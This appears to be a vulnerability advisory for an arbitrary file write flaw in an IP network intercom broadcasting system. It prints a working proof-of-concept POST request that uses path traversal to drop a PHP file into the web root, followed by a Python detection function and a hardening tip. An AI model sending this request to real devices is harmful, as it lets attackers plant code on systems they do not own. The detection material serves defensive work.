There is an arbitrary file write vulnerability in the IP network intercom broadcasting system of Shibang Communications Co., Ltd.
- Affected product
IP network intercom broadcasting system
- Vulnerability location: /php/busyscreenshotpush.php
Vulnerability reproduction
- The directory to write into is passed in the jsondata[callee] parameter, the file name in jsondata[imagename], and the Base64-encoded file content in jsondata[imagecontent]. The PoC is as follows:
```
POST /php/busyscreenshotpush.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

jsondata[caller]=1&jsondata[callee]=../../../../../ICPAS/Wnmp/WWW/php/&jsondata[imagename]=1_2_3.php&jsondata[imagecontent]=aGVsbG8=
```
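
For detection and filtering, the three parameters described above can be checked before a request reaches busyscreenshotpush.php. The following is an added example, not code from the vendor or the original report; the function name `inspect_body`, the image extension allow-list, the magic-byte list and the benign sample body are assumptions made for illustration.

```python
import base64
import binascii
import posixpath
from urllib.parse import parse_qs

IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".bmp", ".gif"}  # assumed allow-list
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"BM", b"GIF8")

# Form body taken from the PoC request on this page.
POC_BODY = ("jsondata[caller]=1&jsondata[callee]=../../../../../ICPAS/Wnmp/WWW/php/"
            "&jsondata[imagename]=1_2_3.php&jsondata[imagecontent]=aGVsbG8=")
# Constructed benign body (assumed shape of a legitimate screenshot push).
BENIGN_BODY = ("jsondata[caller]=1&jsondata[callee]=1002"
               "&jsondata[imagename]=1_2_3.png&jsondata[imagecontent]=iVBORw0KGgo=")

def inspect_body(body: str) -> list[str]:
    """Return the reasons a form body sent to the endpoint looks like a file-write attempt."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    callee = fields.get("jsondata[callee]", "")
    name = fields.get("jsondata[imagename]", "")
    content = fields.get("jsondata[imagecontent]", "")
    findings = []

    # Directory part: a ".." segment, a leading slash or a drive colon leaves the upload root.
    norm = callee.replace("\\", "/")
    if ".." in norm.split("/") or norm.startswith("/") or ":" in norm:
        findings.append("callee-path-traversal")

    # File name: must be a bare name with an image extension.
    if "/" in name or "\\" in name or "\x00" in name:
        findings.append("imagename-has-path")
    if posixpath.splitext(name)[1].lower() not in IMAGE_EXTS:
        findings.append("imagename-not-image")

    # Content: must be strict Base64 that decodes to a known image header.
    try:
        raw = base64.b64decode(content, validate=True)
    except (binascii.Error, ValueError):
        findings.append("content-not-base64")
    else:
        if not raw.startswith(IMAGE_MAGIC):
            findings.append("content-not-image")
    return findings

if __name__ == "__main__":
    print("PoC body:   ", inspect_body(POC_BODY))
    print("benign body:", inspect_body(BENIGN_BODY))
```

The same three checks belong in the handler itself: resolve the final path on the server and reject the request unless it stays inside the intended screenshot directory.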